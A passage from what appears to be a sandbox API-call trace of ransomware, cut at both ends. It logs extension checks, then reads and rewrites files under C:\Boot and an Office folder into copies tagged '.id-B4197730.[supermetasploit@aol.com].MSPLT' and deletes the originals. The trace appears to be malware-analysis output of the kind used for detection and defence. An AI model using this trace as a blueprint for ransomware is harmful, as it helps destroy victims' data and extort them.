(lpString1=".doc", lpString2=".bmp") returned 1 [0173.119] lstrlenW (lpString=".docx") returned 5 [0173.119] lstrcmpiW (lpString1=".docx", lpString2="r.bmp") returned -1 [0173.119] lstrlenW (lpString=".pdf") returned 4 [0173.119] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0173.119] lstrlenW (lpString=".xls") returned 4 [0173.119] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0173.119] lstrlenW (lpString=".xlsx") returned 5 [0173.119] lstrcmpiW (lpString1=".xlsx", lpString2="r.bmp") returned -1 [0173.119] lstrlenW (lpString=".ppt") returned 4 [0173.119] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0173.119] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.119] lstrlenW (lpString=".zip") returned 4 [0173.119] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0173.119] lstrlenW (lpString=".rar") returned 4 [0173.119] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0173.119] lstrlenW (lpString=".bz2") returned 4 [0173.119] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0173.119] lstrlenW (lpString=".7z") returned 3 [0173.119] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0173.119] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.120] lstrlenW (lpString=".dbf") returned 4 [0173.120] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0173.120] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.120] lstrlenW (lpString=".1cd") returned 4 [0173.120] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0173.120] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0173.120] lstrlenW (lpString=".jpg") returned 4 [0173.120] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0173.120] lstrcmpiW (lpString1=".LOG", lpString2=".MSPLT") returned -1 [0173.120] lstrlenW (lpString="BCD.LOG") returned 7 [0173.120] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.120] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.120] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.120] lstrlenW (lpString=".doc") returned 4 [0173.120] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0173.120] lstrlenW (lpString=".docx") returned 5 [0173.120] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0173.120] lstrlenW (lpString=".pdf") returned 4 [0173.120] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0173.120] lstrlenW (lpString=".xls") returned 4 [0173.120] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0173.120] lstrlenW (lpString=".xlsx") returned 5 [0173.120] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0173.121] lstrlenW (lpString=".ppt") returned 4 [0173.121] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0173.121] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.121] lstrlenW (lpString=".zip") returned 4 [0173.121] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0173.121] lstrlenW (lpString=".rar") returned 4 [0173.121] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0173.121] lstrlenW (lpString=".bz2") returned 4 [0173.121] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0173.121] lstrlenW (lpString=".7z") returned 3 [0173.121] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0173.121] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.121] lstrlenW (lpString=".dbf") returned 4 [0173.121] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0173.121] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.121] lstrlenW (lpString=".1cd") returned 4 [0173.121] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0173.121] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.121] lstrlenW (lpString=".jpg") returned 4 [0173.121] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0173.121] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.121] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.121] lstrlenW (lpString=".doc") returned 4 [0173.121] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0173.121] lstrlenW (lpString=".docx") returned 5 [0173.121] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0173.121] lstrlenW (lpString=".pdf") returned 4 [0173.121] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0173.122] lstrlenW (lpString=".xls") returned 4 [0173.122] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0173.122] lstrlenW (lpString=".xlsx") returned 5 [0173.122] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0173.122] lstrlenW (lpString=".ppt") returned 4 [0173.122] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0173.122] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.122] lstrlenW (lpString=".zip") returned 4 [0173.122] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0173.122] lstrlenW (lpString=".rar") returned 4 [0173.122] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0173.122] lstrlenW (lpString=".bz2") returned 4 [0173.122] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0173.122] lstrlenW (lpString=".7z") returned 3 [0173.122] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0173.122] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.122] lstrlenW (lpString=".dbf") returned 4 [0173.122] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0173.122] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.122] lstrlenW (lpString=".1cd") returned 4 [0173.122] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0173.122] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0173.122] lstrlenW (lpString=".jpg") returned 4 [0173.122] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0173.122] lstrcmpiW (lpString1=".DAT", lpString2=".MSPLT") returned -1 [0173.122] lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0173.122] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0173.123] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=65536) returned 1 [0173.123] CloseHandle (hObject=0x2fc) returned 1 [0173.124] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0173.124] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\bootstat.dat.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.124] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0173.124] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0173.124] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0173.124] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\bootstat.dat.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0173.125] GetLastError () returned 0x0 [0173.125] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x10000, lpOverlapped=0x0) returned 1 [0173.128] WriteFile (in: hFile=0x2f4, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x10010, lpOverlapped=0x0) returned 1 [0173.130] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0173.130] WriteFile (in: hFile=0x2f4, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xec, lpOverlapped=0x0) returned 1 [0173.131] SetEndOfFile (hFile=0x2f4) returned 1 [0173.131] CloseHandle (hObject=0x2f4) returned 1 [0173.133] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0173.133] SetEndOfFile (hFile=0x2fc) returned 1 [0173.135] CloseHandle (hObject=0x2fc) returned 1 [0173.135] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x26) returned 1 [0173.135] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0173.136] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.136] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.136] lstrlenW (lpString=".doc") returned 4 [0173.136] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0173.136] lstrlenW (lpString=".docx") returned 5 [0173.136] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0173.136] lstrlenW (lpString=".pdf") returned 4 [0173.136] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0173.136] lstrlenW (lpString=".xls") returned 4 [0173.136] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0173.136] lstrlenW (lpString=".xlsx") returned 5 [0173.136] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0173.136] lstrlenW (lpString=".ppt") returned 4 [0173.136] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0173.136] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.136] lstrlenW (lpString=".zip") returned 4 [0173.136] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0173.136] lstrlenW (lpString=".rar") returned 4 [0173.136] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0173.137] lstrlenW (lpString=".bz2") returned 4 [0173.137] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0173.137] lstrlenW (lpString=".7z") returned 3 [0173.137] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0173.137] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.137] lstrlenW (lpString=".dbf") returned 4 [0173.137] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0173.137] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.137] lstrlenW (lpString=".1cd") returned 4 [0173.137] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0173.137] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.137] lstrlenW (lpString=".jpg") returned 4 [0173.137] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0173.137] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.137] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.137] lstrlenW (lpString=".doc") returned 4 [0173.137] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0173.137] lstrlenW (lpString=".docx") returned 5 [0173.137] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0173.137] lstrlenW (lpString=".pdf") returned 4 [0173.137] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0173.137] lstrlenW (lpString=".xls") returned 4 [0173.137] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0173.137] lstrlenW (lpString=".xlsx") returned 5 [0173.137] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0173.137] lstrlenW (lpString=".ppt") returned 4 [0173.137] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0173.138] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.138] lstrlenW (lpString=".zip") returned 4 [0173.138] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0173.138] lstrlenW (lpString=".rar") returned 4 [0173.138] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0173.138] lstrlenW (lpString=".bz2") returned 4 [0173.138] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0173.138] lstrlenW (lpString=".7z") returned 3 [0173.138] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0173.138] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.138] lstrlenW (lpString=".dbf") returned 4 [0173.138] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0173.138] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.138] lstrlenW (lpString=".1cd") returned 4 [0173.138] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0173.138] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0173.138] lstrlenW (lpString=".jpg") returned 4 [0173.138] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0173.138] lstrcmpiW (lpString1=".p7b", lpString2=".MSPLT") returned 1 [0173.138] lstrlenW (lpString="updaterevokesipolicy.p7b") returned 24 [0173.138] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0173.295] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=4662) returned 1 [0173.295] CloseHandle (hObject=0x374) returned 1 [0173.295] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b")) returned 0x20 [0173.295] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\updaterevokesipolicy.p7b.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.295] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.295] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.296] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.296] lstrlenW (lpString=".doc") returned 4 [0173.296] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0173.296] lstrlenW (lpString=".docx") returned 5 [0173.296] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0173.296] lstrlenW (lpString=".pdf") returned 4 [0173.296] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0173.296] lstrlenW (lpString=".xls") returned 4 [0173.296] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0173.296] lstrlenW (lpString=".xlsx") returned 5 [0173.296] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0173.296] lstrlenW (lpString=".ppt") returned 4 [0173.296] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0173.296] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.296] lstrlenW (lpString=".zip") returned 4 [0173.296] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0173.296] lstrlenW (lpString=".rar") returned 4 [0173.296] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0173.296] lstrlenW (lpString=".bz2") returned 4 [0173.296] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0173.296] lstrlenW (lpString=".7z") returned 3 [0173.296] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0173.296] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.296] lstrlenW (lpString=".dbf") returned 4 [0173.296] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0173.296] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.296] lstrlenW (lpString=".1cd") returned 4 [0173.296] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0173.297] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.297] lstrlenW (lpString=".jpg") returned 4 [0173.297] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0173.297] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.297] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.297] lstrlenW (lpString=".doc") returned 4 [0173.297] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0173.297] lstrlenW (lpString=".docx") returned 5 [0173.297] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0173.297] lstrlenW (lpString=".pdf") returned 4 [0173.297] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0173.297] lstrlenW (lpString=".xls") returned 4 [0173.297] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0173.297] lstrlenW (lpString=".xlsx") returned 5 [0173.297] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0173.297] lstrlenW (lpString=".ppt") returned 4 [0173.297] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0173.297] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.297] lstrlenW (lpString=".zip") returned 4 [0173.297] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0173.297] lstrlenW (lpString=".rar") returned 4 [0173.297] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0173.297] lstrlenW (lpString=".bz2") returned 4 [0173.297] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0173.297] lstrlenW (lpString=".7z") returned 3 [0173.297] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0173.297] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.297] lstrlenW (lpString=".dbf") returned 4 [0173.297] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0173.298] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.298] lstrlenW (lpString=".1cd") returned 4 [0173.298] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0173.298] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0173.298] lstrlenW (lpString=".jpg") returned 4 [0173.298] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0173.298] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0173.298] lstrlenW (lpString="OfficeUpdateSchedule.xml") returned 24 [0173.298] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0173.302] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=4782) returned 1 [0173.302] CloseHandle (hObject=0x2fc) returned 1 [0173.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 0x20 [0173.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0173.302] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0173.302] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0173.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0173.303] GetLastError () returned 0x0 [0173.303] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x12ae, lpOverlapped=0x0) returned 1 [0173.305] WriteFile (in: hFile=0x2f4, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x12b0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x12b0, lpOverlapped=0x0) returned 1 [0173.306] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0173.306] WriteFile (in: hFile=0x2f4, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x104, lpOverlapped=0x0) returned 1 [0173.306] SetEndOfFile (hFile=0x2f4) returned 1 [0173.306] CloseHandle (hObject=0x2f4) returned 1 [0173.307] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0173.307] SetEndOfFile (hFile=0x2fc) returned 1 [0173.308] CloseHandle (hObject=0x2fc) returned 1 [0173.309] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0173.309] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 1 [0173.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.310] lstrlenW (lpString=".doc") returned 4 [0173.310] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.310] lstrlenW (lpString=".docx") returned 5 [0173.310] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0173.310] lstrlenW (lpString=".pdf") returned 4 [0173.310] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.310] lstrlenW (lpString=".xls") returned 4 [0173.310] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.310] lstrlenW (lpString=".xlsx") returned 5 [0173.310] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0173.310] lstrlenW (lpString=".ppt") returned 4 [0173.310] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.310] lstrlenW (lpString=".zip") returned 4 [0173.310] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.310] lstrlenW (lpString=".rar") returned 4 [0173.310] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.310] lstrlenW (lpString=".bz2") returned 4 [0173.310] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.310] lstrlenW (lpString=".7z") returned 3 [0173.310] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.311] lstrlenW (lpString=".dbf") returned 4 [0173.311] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.311] lstrlenW (lpString=".1cd") returned 4 [0173.311] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.311] lstrlenW (lpString=".jpg") returned 4 [0173.311] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0173.311] lstrlenW (lpString=".doc") returned 4 [0173.311] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.311] lstrlenW (lpString=".docx") returned 5 [0173.311] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0173.311] lstrlenW (lpString=".pdf") returned 4 [0173.311] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.311] lstrlenW (lpString=".xls") returned 4 [0173.311] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.311] lstrlenW (lpString=".xlsx") returned 5 [0173.311] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0173.311] lstrlenW (lpString=".ppt") returned 4 [0173.311] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft 